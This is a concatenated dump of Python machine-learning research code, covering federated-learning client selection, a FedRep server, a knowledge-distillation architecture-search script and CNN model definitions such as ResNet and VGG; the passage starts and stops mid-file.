# Apply punishment for repeatedly selected clients
p = self.punishment
scores = [x * (0.9)**p[i] for i, x in enumerate(scores)]
# Select clients with highest scores
sample_clients_index = []
for _ in range(clients_per_round):
top_score_index = scores.index(max(scores))
sample_clients_index.append(top_score_index)
# Overwrite to avoid reselection
scores[top_score_index] = min(scores) - 1
# Extract selected sample clients
sample_clients = [clients[i] for i in sample_clients_index]
# Update punishment factors
self.punishment = [
p[i] + 1 if i in sample_clients_index else 0 for i in range(len(clients))]
return sample_clients
def profiling(self):
import fl_model # pylint: disable=import-error
# Use all clients for profiling
clients = self.clients
# Configure clients for training
self.configuration(clients)
# Train on clients to generate profile weights
threads = [Thread(target=client.train) for client in self.clients]
[t.start() for t in threads]
[t.join() for t in threads]
        # Receive client reports
reports = self.reporting(clients)
# Extract weights from reports
weights = [report.weights for report in reports]
weights = [self.flatten_weights(weight) for weight in weights]
# Extract initial model weights
w0 = self.flatten_weights(fl_model.extract_weights(self.model))
# Save as initial previous model weights
self.w_previous = w0.copy()
# Update initial model using results of profiling
# Perform weight aggregation
logging.info('Aggregating updates')
updated_weights = self.aggregation(reports)
# Load updated weights
fl_model.load_weights(self.model, updated_weights)
# Calculate direction vectors (directors)
directors = [(w - w0) for w in weights]
# Normalize directors to unit length
directors = [d / np.sqrt(np.dot(d, d)) for d in directors]
# Initialize punishment factors
self.punishment = [0 for _ in range(len(clients))]
# Use directors for client profiles
self.profiles = [(client, directors[i])
for i, client in enumerate(clients)]
return self.profiles
``` |
{
"source": "Joey61Liuyi/PFL-Non-IID",
"score": 2
} |
#### File: flcore/servers/serverfedrep.py
```python
import wandb
from flcore.clients.clientfedrep import clientFedRep
from flcore.servers.serverbase import Server
from utils.data_utils import read_client_data
from threading import Thread
import torch
import torchvision.transforms as transforms
import torchvision
import numpy as np
class FedRep(Server):
def __init__(self, device, dataset, algorithm, model, batch_size, learning_rate, global_rounds, local_steps, join_clients,
num_clients, times, eval_gap, client_drop_rate, train_slow_rate, send_slow_rate, time_select, goal, time_threthold, run_name):
super().__init__(dataset, algorithm, model, batch_size, learning_rate, global_rounds, local_steps, join_clients,
num_clients, times, eval_gap, client_drop_rate, train_slow_rate, send_slow_rate, time_select, goal,
time_threthold, run_name)
# select slow clients
self.set_slow_clients()
for i, train_slow, send_slow in zip(range(self.num_clients), self.train_slow_clients, self.send_slow_clients):
# train, test = read_client_data(dataset, i)
client = clientFedRep(device, i, train_slow, send_slow, self.train_all[i], self.test_all[i], model, batch_size, learning_rate, local_steps)
self.clients.append(client)
del(self.train_all)
del(self.test_all)
print(f"\nJoin clients / total clients: {self.join_clients} / {self.num_clients}")
print("Finished creating server and clients.")
def train(self):
for i in range(self.start_epoch, self.global_rounds+1):
print(f"\n-------------Round number: {i}-------------")
self.send_models()
if i<self.global_rounds/2:
eval_gap = 50
elif i< self.global_rounds*95/100 and i>=self.global_rounds/2:
eval_gap = 20
else:
eval_gap = 1
if i%eval_gap == 0:
print("\nEvaluate global model")
test_acc, train_acc, train_loss, personalized_acc = self.evaluate(i)
info_dict = {
"learning_rate": self.clients[0].optimizer.state_dict()['param_groups'][0]['lr'],
"global_valid_top1_acc": test_acc*100,
"average_valid_top1_acc": personalized_acc*100,
"epoch": i
}
# print(info_dict)
wandb.log(info_dict)
self.selected_clients = self.clients
for client in self.clients:
# client.scheduler.update(i, 0.0)
client.train()
# threads = [Thread(target=client.train)
# for client in self.selected_clients]
# [t.start() for t in threads]
# [t.join() for t in threads]
self.receive_models()
self.aggregate_parameters()
if i % 100 == 0:
self.save_global_model_middle(i)
print("\nBest global results.")
self.print_(max(self.rs_test_acc), max(
self.rs_train_acc), min(self.rs_train_loss), personalized_acc)
self.save_results()
self.save_global_model()
``` |
{
"source": "Joey61Liuyi/TAS",
"score": 2
} |
#### File: exps/algos/Block_wise_TANAS.py
```python
import sys, time, random, argparse
from copy import deepcopy
import torch
from pathlib import Path
import numpy as np
import torch.nn as nn
import math
import os
import torch.nn.init as init
import torch.nn.functional as F
import warnings
warnings.filterwarnings("ignore")
lib_dir = (Path(__file__).parent / ".." / ".." / "lib").resolve()
if str(lib_dir) not in sys.path:
sys.path.insert(0, str(lib_dir))
from config_utils import load_config, dict2config
from datasets import get_datasets, get_nas_search_loaders
from procedures import (
prepare_seed,
prepare_logger,
save_checkpoint,
copy_checkpoint,
get_optim_scheduler,
)
from utils import get_model_infos, obtain_accuracy
from log_utils import AverageMeter, time_string, convert_secs2time
from models import get_cell_based_tiny_net, get_search_spaces
from nas_201_api import NASBench201API as API
from models import create_cnn_model, count_parameters_in_MB
def search_func_modified(xloader,
teacher_model,
network,
student_model,
criterion,
scheduler,
w_optimizer,
a_optimizer,
epoch_str,
print_freq,
logger,
):
teacher_model.eval()
student_model.eval()
data_time, batch_time = AverageMeter(), AverageMeter()
base_losses, base_top1, base_top5 = AverageMeter(), AverageMeter(), AverageMeter()
arch_losses, arch_top1, arch_top5 = AverageMeter(), AverageMeter(), AverageMeter()
end = time.time()
T = 5
lambda_ = 0.5
for step, (base_inputs, base_targets, arch_inputs, arch_targets) in enumerate(
xloader
):
scheduler.update(None, 1.0 * step / len(xloader))
base_targets = base_targets.cuda(non_blocking=True)
arch_targets = arch_targets.cuda(non_blocking=True)
# measure data loading time
data_time.update(time.time() - end)
network.train()
w_optimizer.zero_grad()
_, logits = network(base_inputs.cuda())
logits_teacher = teacher_model(base_inputs.cuda())
logits_student = student_model(base_inputs.cuda())
loss_KD_TA = T * T * nn.KLDivLoss()(F.log_softmax(logits / T, dim=1),
F.softmax(logits_teacher / T, dim=1))
loss_KD_TA+= T * T * nn.KLDivLoss()(F.log_softmax(logits / T, dim=1),
F.softmax(logits_student / T, dim=1))
base_loss = (1 - lambda_) * criterion(logits, base_targets) + lambda_ * loss_KD_TA
base_loss.backward()
torch.nn.utils.clip_grad_norm_(network.parameters(), 5)
w_optimizer.step()
# record
base_prec1, base_prec5 = obtain_accuracy(
logits.data, base_targets.data, topk=(1, 5)
)
base_losses.update(base_loss.item(), base_inputs.size(0))
base_top1.update(base_prec1.item(), base_inputs.size(0))
base_top5.update(base_prec5.item(), base_inputs.size(0))
# update the architecture-weight
a_optimizer.zero_grad()
_, logits = network(arch_inputs.cuda())
logits_teacher = teacher_model(arch_inputs.cuda())
logits_student = student_model(arch_inputs.cuda())
loss_KD_TA = T * T * nn.KLDivLoss()(F.log_softmax(logits / T, dim=1),
F.softmax(logits_teacher / T, dim=1))
loss_KD_TA += T * T * nn.KLDivLoss()(F.log_softmax(logits / T, dim=1),
F.softmax(logits_student / T, dim=1))
arch_loss = (1 - lambda_) * criterion(logits, arch_targets) + lambda_ * loss_KD_TA
arch_loss.backward()
a_optimizer.step()
# record
arch_prec1, arch_prec5 = obtain_accuracy(
logits.data, arch_targets.data, topk=(1, 5)
)
arch_losses.update(arch_loss.item(), arch_inputs.size(0))
arch_top1.update(arch_prec1.item(), arch_inputs.size(0))
arch_top5.update(arch_prec5.item(), arch_inputs.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if step % print_freq == 0 or step + 1 == len(xloader):
Sstr = (
"*SEARCH* "
+ time_string()
+ " [{:}][{:03d}/{:03d}]".format(epoch_str, step, len(xloader))
)
Tstr = "Time {batch_time.val:.2f} ({batch_time.avg:.2f}) Data {data_time.val:.2f} ({data_time.avg:.2f})".format(
batch_time=batch_time, data_time=data_time
)
Wstr = "Base [Loss {loss.val:.3f} ({loss.avg:.3f}) Prec@1 {top1.val:.2f} ({top1.avg:.2f}) Prec@5 {top5.val:.2f} ({top5.avg:.2f})]".format(
loss=base_losses, top1=base_top1, top5=base_top5
)
Astr = "Arch [Loss {loss.val:.3f} ({loss.avg:.3f}) Prec@1 {top1.val:.2f} ({top1.avg:.2f}) Prec@5 {top5.val:.2f} ({top5.avg:.2f})]".format(
loss=arch_losses, top1=arch_top1, top5=arch_top5
)
logger.log(Sstr + " " + Tstr + " " + Wstr + " " + Astr)
return base_losses.avg, base_top1.avg, base_top5.avg, arch_losses.avg, arch_top1.avg, arch_top5.avg
def main(xargs):
assert torch.cuda.is_available(), "CUDA is not available."
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
torch.set_num_threads(xargs.workers)
prepare_seed(xargs.rand_seed)
logger = prepare_logger(args)
train_data, valid_data, xshape, class_num = get_datasets(
xargs.dataset, xargs.data_path, -1
)
# config_path = 'configs/nas-benchmark/algos/GDAS.config'
config = load_config(
xargs.config_path, {"class_num": class_num, "xshape": xshape}, logger
)
search_loader, _, valid_loader = get_nas_search_loaders(
train_data,
valid_data,
xargs.dataset,
"../../configs/nas-benchmark",
config.batch_size,
xargs.workers,
)
teacher_model = xargs.teacher_model
TA = xargs.TA
student = xargs.student_model
teacher_checkpoint = xargs.teacher_checkpoint
student_checkpoint = xargs.student_checkpoint
epoch_online = xargs.epoch_online
logger.log(
"||||||| {:10s} ||||||| Search-Loader-Num={:}, batch size={:}".format(
xargs.dataset, len(search_loader), config.batch_size
)
)
logger.log("||||||| {:10s} ||||||| Config={:}".format(xargs.dataset, config))
search_space = get_search_spaces("cell", xargs.search_space_name)
if xargs.model_config is None:
model_config = dict2config(
{
"name": "GDAS",
"C": xargs.channel,
"N": xargs.num_cells,
"max_nodes": xargs.max_nodes,
"num_classes": class_num,
"space": search_space,
"affine": False,
"track_running_stats": bool(xargs.track_running_stats),
},
None,
)
else:
model_config = load_config(
xargs.model_config,
{
"num_classes": class_num,
"space": search_space,
"affine": False,
"track_running_stats": bool(xargs.track_running_stats),
},
None,
)
search_model = get_cell_based_tiny_net(model_config)
logger.log("search-model :\n{:}".format(search_model))
logger.log("model-config : {:}".format(model_config))
student_accuracy = {'best': -1}
TA_accuracy = {'best': -1}
w_optimizer, w_scheduler, criterion = get_optim_scheduler(
search_model.get_weights(), config
)
a_optimizer = torch.optim.Adam(
search_model.get_alphas(),
lr=xargs.arch_learning_rate,
betas=(0.5, 0.999),
weight_decay=xargs.arch_weight_decay,
)
logger.log("w-optimizer : {:}".format(w_optimizer))
logger.log("a-optimizer : {:}".format(a_optimizer))
logger.log("w-scheduler : {:}".format(w_scheduler))
logger.log("criterion : {:}".format(criterion))
flop, param = get_model_infos(search_model, xshape)
logger.log("FLOP = {:.2f} M, Params = {:.2f} MB".format(flop, param))
logger.log("search-space [{:} ops] : {:}".format(len(search_space), search_space))
if xargs.arch_nas_dataset is None:
api = None
else:
api = API(xargs.arch_nas_dataset)
logger.log("{:} create API = {:} done".format(time_string(), api))
last_info, model_base_path, model_best_path = (
logger.path("info"),
logger.path("model"),
logger.path("best"),
)
network, criterion = torch.nn.DataParallel(search_model).cuda(), criterion.cuda()
if last_info.exists(): # automatically resume from previous checkpoint
logger.log(
"=> loading checkpoint of the last-info '{:}' start".format(last_info)
)
last_info = torch.load(last_info)
start_epoch = last_info["epoch"]
checkpoint = torch.load(last_info["last_checkpoint"])
genotypes = checkpoint["genotypes"]
valid_accuracies = checkpoint["valid_accuracies"]
search_model.load_state_dict(checkpoint["search_model"])
w_scheduler.load_state_dict(checkpoint["w_scheduler"])
w_optimizer.load_state_dict(checkpoint["w_optimizer"])
a_optimizer.load_state_dict(checkpoint["a_optimizer"])
logger.log(
"=> loading checkpoint of the last-info '{:}' start with {:}-th epoch.".format(
last_info, start_epoch
)
)
else:
logger.log("=> do not find the last-info file : {:}".format(last_info))
start_epoch, valid_accuracies, genotypes = (
0,
{"best": -1},
{-1: search_model.genotype()},
)
# start training
start_time, search_time, epoch_time, total_epoch = (
time.time(),
AverageMeter(),
AverageMeter(),
config.epochs + config.warmup,
)
teacher_model, teacher_optimizer, teacher_scheduler = create_cnn_model(teacher_model, train_data, total_epoch, teacher_checkpoint, use_cuda=1)
# if teacher_checkpoint:
# teacher_model = load_checkpoint(teacher_model, teacher_checkpoint)
# else:
# teacher_model = train_teacher(search_loader, teacher_model, criterion, teacher_optimizer, logger, total_epoch, xargs.teacher_model)
# if TA:
student_model, student_optimizer, student_scheduler = create_cnn_model(student, train_data, total_epoch, student_checkpoint, use_cuda=1)
# if student_checkpoint:
# student_model = load_checkpoint(student_model, student_checkpoint)
# checkpoint = torch.load(student_checkpoint)
# student_optimizer.load_state_dict(checkpoint['optimizer'])
# if TA != 'GDAS':
# network, w_optimizer = create_cnn_model(TA, train_data, use_cuda=1)
# # w_optimizer = torch.optim.Adam(network .parameters(), lr=0.025, betas=(0.5, 0.999), weight_decay=1e-4)
# a_optimizer = None
for epoch in range(start_epoch, total_epoch):
w_scheduler.update(epoch, 0.0)
need_time = "Time Left: {:}".format(
convert_secs2time(epoch_time.val * (total_epoch - epoch), True)
)
epoch_str = "{:03d}-{:03d}".format(epoch, total_epoch)
search_model.set_tau(
xargs.tau_max - (xargs.tau_max - xargs.tau_min) * epoch / (total_epoch - 1)
)
logger.log(
"\n[Search the {:}-th epoch] {:}, tau={:}, LR={:}".format(
epoch_str, need_time, search_model.get_tau(), min(w_scheduler.get_lr())
)
)
search_w_loss, search_w_top1, search_w_top5, valid_a_loss, valid_a_top1, valid_a_top5 = search_func_modified(
search_loader,
teacher_model,
network,
student_model,
criterion,
w_scheduler,
w_optimizer,
a_optimizer,
epoch_str,
xargs.print_freq,
logger,
)
# else:
# Student_optimizer = None
# training_mode = 0
# search_w_loss, search_w_top1, search_w_top5, valid_a_loss, valid_a_top1, valid_a_top5, student_loss, student_top1, student_top5 = search_func(search_loader,
# teacher_model,
# network,
# student_model,
# criterion,
# w_scheduler,
# w_optimizer,
# a_optimizer,
# Student_optimizer,
search_time.update(time.time() - start_time)
logger.log(
"[{:}] searching : loss={:.2f}, accuracy@1={:.2f}%, accuracy@5={:.2f}%, time-cost={:.1f} s".format(
epoch_str, search_w_loss, search_w_top1, search_w_top5, search_time.sum
)
)
logger.log(
"[{:}] evaluate : loss={:.2f}, accuracy@1={:.2f}%, accuracy@5={:.2f}%".format(
epoch_str, valid_a_loss, valid_a_top1, valid_a_top5
)
)
# logger.log(
# "[{:}] student : loss={:.2f}, accuracy@1={:.2f}%, accuracy@5={:.2f}%".format(
# epoch_str, student_loss, student_top1, student_top5
# )
# )
# check the best accuracy
# student_accuracy[epoch] = student_top1
# if student_top1 > student_accuracy['best']:
# student_accuracy['best'] = student_top1
TA_accuracy[epoch] = search_w_top1
if search_w_top1 > TA_accuracy['best']:
TA_accuracy['best'] = search_w_top1
valid_accuracies[epoch] = valid_a_top1
if valid_a_top1 > valid_accuracies["best"]:
valid_accuracies["best"] = valid_a_top1
genotypes["best"] = search_model.genotype()
find_best = True
else:
find_best = False
genotypes[epoch] = search_model.genotype()
logger.log(
"<<<--->>> The {:}-th epoch : {:}".format(epoch_str, genotypes[epoch])
)
# save checkpoint
save_path = save_checkpoint(
{
"epoch": epoch + 1,
"args": deepcopy(xargs),
"search_model": search_model.state_dict(),
"w_optimizer": w_optimizer.state_dict(),
"a_optimizer": a_optimizer.state_dict(),
"w_scheduler": w_scheduler.state_dict(),
"genotypes": genotypes,
"valid_accuracies": valid_accuracies,
},
model_base_path,
logger,
)
last_info = save_checkpoint(
{
"epoch": epoch + 1,
"args": deepcopy(args),
"last_checkpoint": save_path,
},
logger.path("info"),
logger,
)
if find_best:
logger.log(
"<<<--->>> The {:}-th epoch : find the highest validation accuracy : {:.2f}%.".format(
epoch_str, valid_a_top1
)
)
copy_checkpoint(model_base_path, model_best_path, logger)
with torch.no_grad():
logger.log("{:}".format(search_model.show_alphas()))
if api is not None:
logger.log("{:}".format(api.query_by_arch(genotypes[epoch], "200")))
# measure elapsed time
epoch_time.update(time.time() - start_time)
start_time = time.time()
# if TA!='GDAS':
# student_model, student_optimizer = create_cnn_model(student, train_data, use_cuda=1)
#
# student_best = -1
# for epoch in range(start_epoch, total_epoch):
# student_loss, student_top1, student_top5 = train_student(search_loader,
# network,
# student_model,
# criterion,
# student_optimizer,
# epoch_str,
# xargs.print_freq,
# logger,)
#
# student_accuracy[epoch] = student_top1
# if student_top1 > student_accuracy['best']:
# student_accuracy['best'] = student_top1
logger.log("\n" + "-" * 100)
# check the performance from the architecture dataset
logger.log(
"GDAS : run {:} epochs, cost {:.1f} s, last-geno is {:}.".format(
total_epoch, search_time.sum, genotypes[epoch - 1]
)
)
if api is not None:
logger.log("{:}".format(api.query_by_arch(genotypes[epoch - 1], "200")))
logger.log('----------------')
logger.log('we used {:} as our Teacher with param size {:}'.format(xargs.teacher_model, count_parameters_in_MB(teacher_model)))
logger.log('we used {:} as our TA with param size {:}'.format(TA, count_parameters_in_MB(network)))
logger.log('we used {:} as our Student with param size {:}'.format(xargs.student_model, count_parameters_in_MB(student_model)))
logger.log('we used {:} online epochs out of total epochs of {:}'.format(xargs.epoch_online, total_epoch))
logger.log('The best ACC of TA: {:.2f}%'.format(TA_accuracy['best']))
logger.log('The best ACC of Student: {:.2f}%'.format(student_accuracy['best']))
logger.log('----------------')
logger.close()
# else:
# if student:
# student_model, student_optimizer = create_cnn_model(student, train_data, use_cuda=1)
# student_best = -1
# for epoch in range(start_epoch, total_epoch):
# epoch_str = "{:03d}-{:03d}".format(epoch, total_epoch)
# student_loss, student_top1, student_top5 = train_student(search_loader,
# teacher_model,
# student_model,
# criterion,
# student_optimizer,
# epoch_str,
# xargs.print_freq,
# logger, )
#
# student_accuracy[epoch] = student_top1
# if student_top1 > student_accuracy['best']:
# student_accuracy['best'] = student_top1
#
# logger.log('----------------')
# logger.log('we used {:} as our Teacher with param size {:}'.format(xargs.teacher_model, count_parameters_in_MB(teacher_model)))
# logger.log('we used {:} as our TA with param size {:}'.format(TA, count_parameters_in_MB(network)))
# logger.log('we used {:} as our Student with param size {:}'.format(xargs.student_model, count_parameters_in_MB(student_model)))
# logger.log('we used {:} online epochs out of total epochs of {:}'.format(xargs.epoch_online, total_epoch))
# logger.log('The best ACC of : {:.2f}%'.format(TA_accuracy['best']))
# logger.log('The best ACC of Student: {:.2f}%'.format(student_accuracy['best']))
# logger.log('----------------')
# logger.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser("GDAS")
parser.add_argument("--data_path", default='../../data', type=str, help="Path to dataset")
parser.add_argument(
"--dataset",
type=str,
default= 'cifar100',
choices=["cifar10", "cifar100", "ImageNet16-120"],
help="Choose between Cifar10/100 and ImageNet-16.",
)
# channels and number-of-cells
parser.add_argument("--search_space_name", default='darts', type=str, help="The search space name.")
parser.add_argument("--max_nodes", type=int, help="The maximum number of nodes.")
parser.add_argument("--channel", type=int, help="The number"
" of channels.")
parser.add_argument(
"--num_cells", type=int, help="The number of cells in one "
"。stage."
)
parser.add_argument(
"--track_running_stats",
type=int,
default=1,
choices=[0, 1],
help="Whether use track_running_stats or not in the BN layer.",
)
parser.add_argument(
"--config_path", default='../../configs/search-opts/GDAS-NASNet-CIFAR.config', type=str, help="The path of the configuration."
)
parser.add_argument(
"--model_config",
default='../../configs/search-archs/GDAS-NASNet-CIFAR.config',
type=str,
help="The path of the model configuration. When this arg is set, it will cover max_nodes / channels / num_cells.",
)
    # architecture learning rate
parser.add_argument(
"--arch_learning_rate",
type=float,
default=3e-4,
help="learning rate for arch encoding",
)
parser.add_argument(
"--arch_weight_decay",
type=float,
default=1e-3,
help="weight decay for arch encoding",
)
parser.add_argument("--tau_min", default=10, type=float, help="The minimum tau for Gumbel")
parser.add_argument("--tau_max", default=0.1, type=float, help="The maximum tau for Gumbel")
# log
parser.add_argument(
"--workers",
type=int,
default=4,
help="number of data loading workers (default: 2)",
)
parser.add_argument(
"--save_dir", default='./output/search-cell-dar/GDAS-cifar10-BN1', type=str, help="Folder to save checkpoints and log."
)
parser.add_argument(
"--arch_nas_dataset",
type=str,
help="The path to load the architecture dataset (tiny-nas-benchmark).",
)
parser.add_argument("--print_freq", default=200, type=int, help="print frequency (default: 200)")
parser.add_argument("--rand_seed", default= -1, type=int, help="manual seed")
parser.add_argument("--teacher_model", default="vgg19", type=str, help="type of teacher mode")
parser.add_argument("--TA", default='GDAS', type=str, help="type of TA")
parser.add_argument("--student_model", default='lenet', type=str, help="type of student mode")
parser.add_argument("--teacher_checkpoint", default='../output/nas-infer/cifar10-BS96-gdas_serached/checkpoint/seed-71956-bestNone_vgg19_68.08%_07-19,06.pth', type=str, help="teacher mode's check point")
parser.add_argument("--student_checkpoint", default='../output/nas-infer/cifar10-BS96-gdas_serached/checkpoint/seed-62735-bestNone_lenet_33.10%_07-20,01.pth', type=str,
help="student mode's check point")
parser.add_argument("--epoch_online", default=250, type=int, help="online training of TA and student")
args = parser.parse_args()
if args.rand_seed is None or args.rand_seed < 0:
args.rand_seed = 99999
# #
# #
# teacher_models = ['resnet110', 'resnet56', 'resnet44', 'resnet32', 'resnet26', 'resnet20', 'resnet14', 'resnet8', 'plane10', 'plane8', 'plane 6','plane4','plane2' ]
# teacher_models = ['vgg16']
# for one in teacher_models:
# args.teacher_model = one
# TA_models = ['plane4', 'plane6', 'resnet26', 'resnet20']
# for one in TA_models:
# args.TA = one
main(args)
```
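The core of `search_func_modified` above is a teacher-assistant knowledge-distillation loss: the supernet's logits are pulled toward both the teacher's and the student's temperature-softened outputs, and the result is mixed with plain cross-entropy via `lambda_`. A minimal sketch of that loss in isolation (the helper name and the random inputs are illustrative only):

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

def ta_kd_loss(logits, logits_teacher, logits_student, targets, T=5.0, lambda_=0.5):
    # temperature-scaled KL toward the teacher ...
    kd = T * T * nn.KLDivLoss()(F.log_softmax(logits / T, dim=1),
                                F.softmax(logits_teacher / T, dim=1))
    # ... plus temperature-scaled KL toward the student
    kd = kd + T * T * nn.KLDivLoss()(F.log_softmax(logits / T, dim=1),
                                     F.softmax(logits_student / T, dim=1))
    # mix with ordinary cross-entropy on the hard labels
    return (1 - lambda_) * nn.CrossEntropyLoss()(logits, targets) + lambda_ * kd

# Example with random logits for a batch of 4 samples and 10 classes.
loss = ta_kd_loss(torch.randn(4, 10), torch.randn(4, 10), torch.randn(4, 10),
                  torch.tensor([1, 0, 3, 7]))
print(loss.item())
```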
#### File: lib/models/addtional_models.py
```python
import numpy as np
import torch.nn as nn
import torch
import torch.nn.functional as F
import math
from torch.optim.lr_scheduler import _LRScheduler
class_num = 10
class ExponentialLR(_LRScheduler):
def __init__(self, optimizer, end_lr, num_iter, last_epoch=-1):
self.end_lr = end_lr
self.num_iter = num_iter
super(ExponentialLR, self).__init__(optimizer, last_epoch)
def get_lr(self):
curr_iter = self.last_epoch
r = curr_iter / self.num_iter
return [base_lr * (self.end_lr / base_lr) ** r for base_lr in self.base_lrs]
def conv3x3(in_planes, out_planes, stride=1):
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)
class ResNet(nn.Module):
def __init__(self, depth, num_classes=100, block_name='BasicBlock'):
super(ResNet, self).__init__()
# Model type specifies number of layers for CIFAR-10 model
if block_name.lower() == 'basicblock':
assert (depth - 2) % 6 == 0, 'When use basicblock, depth should be 6n+2, e.g. 20, 32, 44, 56, 110, 1202'
n = (depth - 2) // 6
block = BasicBlock
elif block_name.lower() == 'bottleneck':
assert (depth - 2) % 9 == 0, 'When use bottleneck, depth should be 9n+2, e.g. 20, 29, 47, 56, 110, 1199'
n = (depth - 2) // 9
block = Bottleneck
else:
            raise ValueError('block_name should be BasicBlock or Bottleneck')
self.inplanes = 16
self.conv1 = nn.Conv2d(3, 16, kernel_size=3, padding=1,
bias=False)
self.bn1 = nn.BatchNorm2d(16)
self.relu = nn.ReLU(inplace=True)
self.layer1 = self._make_layer(block, 16, n)
self.layer2 = self._make_layer(block, 32, n, stride=2)
self.layer3 = self._make_layer(block, 64, n, stride=2)
self.avgpool = nn.AvgPool2d(8)
self.fc = nn.Linear(64 * block.expansion, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x) # 32x32
x = self.layer1(x) # 32x32
x = self.layer2(x) # 16x16
x = self.layer3(x) # 8x8
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
class ResNet_Cifar(nn.Module):
def __init__(self, block, layers, num_classes=10):
super(ResNet_Cifar, self).__init__()
self.inplanes = 16
self.conv1 = nn.Conv2d(3, 16, kernel_size=3, stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(16)
self.relu = nn.ReLU(inplace=True)
self.layer1 = self._make_layer(block, 16, layers[0])
self.layer2 = self._make_layer(block, 32, layers[1], stride=2)
self.layer3 = self._make_layer(block, 64, layers[2], stride=2)
self.avgpool = nn.AvgPool2d(8, stride=1)
self.fc = nn.Linear(64 * block.expansion, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion)
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class ConvNetMaker(nn.Module):
"""
Creates a simple (plane) convolutional neural network
"""
def __init__(self, layers):
"""
        Builds a CNN from the provided list of layer specifications.
        The details of this list are available in the paper.
        :param layers: a list of strings representing layers, e.g. ["Conv32", "MaxPool", "FC10"]
"""
super(ConvNetMaker, self).__init__()
self.conv_layers = []
self.fc_layers = []
h, w, d = 32, 32, 3
previous_layer_filter_count = 3
previous_layer_size = h * w * d
num_fc_layers_remained = len([1 for l in layers if l.startswith('FC')])
for layer in layers:
if layer.startswith('Conv'):
filter_count = int(layer[4:])
self.conv_layers += [nn.Conv2d(previous_layer_filter_count, filter_count, kernel_size=3, padding=1),
nn.BatchNorm2d(filter_count), nn.ReLU(inplace=True)]
previous_layer_filter_count = filter_count
d = filter_count
previous_layer_size = h * w * d
elif layer.startswith('MaxPool'):
self.conv_layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
h, w = int(h / 2.0), int(w / 2.0)
previous_layer_size = h * w * d
elif layer.startswith('FC'):
num_fc_layers_remained -= 1
current_layer_size = int(layer[2:])
if num_fc_layers_remained == 0:
self.fc_layers += [nn.Linear(previous_layer_size, current_layer_size)]
else:
self.fc_layers += [nn.Linear(previous_layer_size, current_layer_size), nn.ReLU(inplace=True)]
previous_layer_size = current_layer_size
conv_layers = self.conv_layers
fc_layers = self.fc_layers
self.conv_layers = nn.Sequential(*conv_layers)
self.fc_layers = nn.Sequential(*fc_layers)
def forward(self, x):
x = self.conv_layers(x)
x = x.view(x.size(0), -1)
x = self.fc_layers(x)
return x
def resnet14_cifar(**kwargs):
model = ResNet_Cifar(BasicBlock, [2, 2, 2], **kwargs)
return model
def resnet8_cifar(**kwargs):
model = ResNet_Cifar(BasicBlock, [1, 1, 1], **kwargs)
return model
def resnet20_cifar(**kwargs):
model = ResNet_Cifar(BasicBlock, [3, 3, 3], **kwargs)
return model
def resnet26_cifar(**kwargs):
model = ResNet_Cifar(BasicBlock, [4, 4, 4], **kwargs)
return model
def resnet32_cifar(**kwargs):
model = ResNet_Cifar(BasicBlock, [5, 5, 5], **kwargs)
return model
def resnet44_cifar(**kwargs):
model = ResNet_Cifar(BasicBlock, [7, 7, 7], **kwargs)
return model
def resnet56_cifar(**kwargs):
model = ResNet_Cifar(BasicBlock, [9, 9, 9], **kwargs)
return model
def resnet110_cifar(**kwargs):
model = ResNet_Cifar(BasicBlock, [18, 18, 18], **kwargs)
# model = ResNet(depth=110)
return model
class VGG(nn.Module):
def __init__(self, features, output_dim):
super().__init__()
self.features = features
self.avgpool = nn.AdaptiveAvgPool2d(7)
self.classifier = nn.Sequential(
nn.Linear(512 * 7 * 7, 4096),
nn.ReLU(inplace=True),
nn.Dropout(0.5),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Dropout(0.5),
nn.Linear(4096, output_dim),
)
def forward(self, x):
x = self.features(x)
x = self.avgpool(x)
h = x.view(x.shape[0], -1)
